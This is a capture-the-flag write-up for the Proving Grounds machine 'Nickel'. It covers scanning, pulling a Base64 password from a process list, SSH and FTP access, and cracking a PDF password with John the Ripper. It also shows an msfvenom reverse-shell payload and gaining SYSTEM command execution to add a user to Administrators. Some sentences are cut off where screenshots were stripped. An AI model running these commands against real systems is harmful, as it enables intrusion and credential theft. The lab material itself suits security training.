Comment on page
Writeup for Nickel from Offensive Security Proving Grounds (PG)
nmapAutomator.sh -H 192.168.90.99 -t full
nmapAutomator.sh -H 192.168.90.99 -t vulns
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.90 LPORT=443 EXITFUNC=thread -f python
On port 8089, we have a dashboard:
Each of the links bring us to 169.254.109.39:33333. By going to 192.168.90.99:33333 instead, we get a Not Found response for
We get a different message, however, for
If we send a POST request instead, we indeed see a list of running processes!
In the command line of one of the processes, we get a user's credentials.
-pparameter into CyberChef, we can see that it is a Base 64 encoded password (
Using the credentials
ariah:NowiseSloopTheory139, we can SSH into the server.
Using previously found credentials for
ariah, we can access the FTP service and download a PDF file.
However, a password is required. The previously found password does not work.
pdf2john.plto extract the hash.
perl john-bleeding-jumbo/run/pdf2john.pl Infrastructure.pdf > Infrastructure-Hash.txt
Use John the Ripper to crack the hash.
john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt
The password is
Here, we find a 'Temporary Command endpoint' at
http://nickel/that is only accessible through the remote machine.
Using Powershell, we can send a GET request to the API endpoint.
$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
whoami, and we can see the output below.
We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing - adding ourselves to the
localgroup Administrators ariah /add
If we check the Administrators group again (
net localgroup Administrators), we can see that our user
Now, we can RDP into the machine and run the command prompt as Administrator.